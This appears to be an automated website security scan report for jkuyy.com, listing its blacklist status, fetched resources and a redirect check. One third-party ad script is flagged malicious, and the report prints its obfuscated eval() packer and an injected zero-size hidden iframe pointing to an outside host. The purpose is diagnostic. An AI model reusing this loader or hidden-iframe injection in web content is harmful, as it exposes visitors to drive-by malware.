Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jkuyy.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.jkuyy.com/ | HTTP/1.1 200 OK Date: Wed, 16 Jul 2014 23:40:14 GMT Accept-Ranges: bytes ETag: "ce2f9a22aa1cf1:13c9" Server: Microsoft-IIS/6.0 Content-Length: 107340 Content-Location: http://www.jkuyy.com/index.html Content-Type: text/html Last-Modified: Wed, 16 Jul 2014 15:25:11 GMT X-Powered-By: ASP.NET | clean |
http://www.jkuyy.com/index.html | 200 OK Content-Length: 107340 Content-Type: text/html | clean |
http://www.jkuyy.com/img/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93869 Content-Type: application/x-javascript | clean |
http://www.jkuyy.com/img/js/jquery.base.js | 200 OK Content-Length: 9608 Content-Type: application/x-javascript | clean |
http://www.jkuyy.com/img/js/jquery.prettyGallery.js | 200 OK Content-Length: 3647 Content-Type: application/x-javascript | clean |
http://www.jkuyy.com/img/js/jquery.prettyGallery1.js | 200 OK Content-Length: 7403 Content-Type: application/x-javascript | clean |
http://www.jkuyy.com/img/js/language.js | 200 OK Content-Length: 12966 Content-Type: application/x-javascript | clean |
http://www.jkuyy.com/js/ads/960.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://www.jkuyy.com/js/ads/961.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://s14.cnzz.com/stat.php?id=5566802&web_id=5566802 | 200 OK Content-Length: 9322 Content-Type: application/javascript | clean |
http://www.jkuyy.com/js/ads/pi.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://js.union.doudouguo.com/c.js | 200 OK Content-Length: 4393 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p, a, c, k, e, d) { e = function(c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function(e) { return d[e] } ]; e = function() { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p } ('(8(){8 s(b){f b!=y?\'"\'+b+\'"\':\'""\'}8 e(b){5(2r 1G=="8"){f 1G(b)}z{f 2s if (window.ddgu_uid != '18717' && window.ddgu_uid != '23298' && window.ddgu_uid != '25450' && window.ddgu_uid != '26022' && window.ddgu_uid != '29081' && window.ddgu_uid != '30453') { document.write('<iframe src="http://qiqu.hahatuba.com/x/app/76_522.htm?uid=' + window.ddgu_uid + '&zoneid=' + window.ddgu_zid + '" width="0" height="0" frameborder="0" scrolling="no"></iframe>'); } Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://qiqu.hahatuba.com/x/app/76_522.htm?uid= <iframe src="http://qiqu.hahatuba.com/x/app/76_522.htm?uid=' + window.ddgu_uid + '&zoneid=' + window.ddgu_zid + '" width="0" height="0" frameborder="0" scrolling="no"> | ||
http://www.jkuyy.com/search.asp?searchword=%D2%BB%C2%B7%CF%F2%CE%F7 | 200 OK Content-Length: 684 Content-Type: text/html | clean |
http://www.jkuyy.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.jkuyy.com/search.asp?searchword=%CE%F7%D3%CE%A1%A4%BD%B5%C4%A7%C6%AA | 200 OK Content-Length: 684 Content-Type: text/html | clean |
http://www.jkuyy.com/search.asp?searchword=%BF%EC%C0%D6%B5%BD%BC%D2 | 200 OK Content-Length: 684 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jkuyy.com
Result:
GET / HTTP/1.1
Host: jkuyy.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: jkuyy.com
Referer: http://www.google.com/search?q=jkuyy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jkuyy.com
Referer: http://www.google.com/search?q=jkuyy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.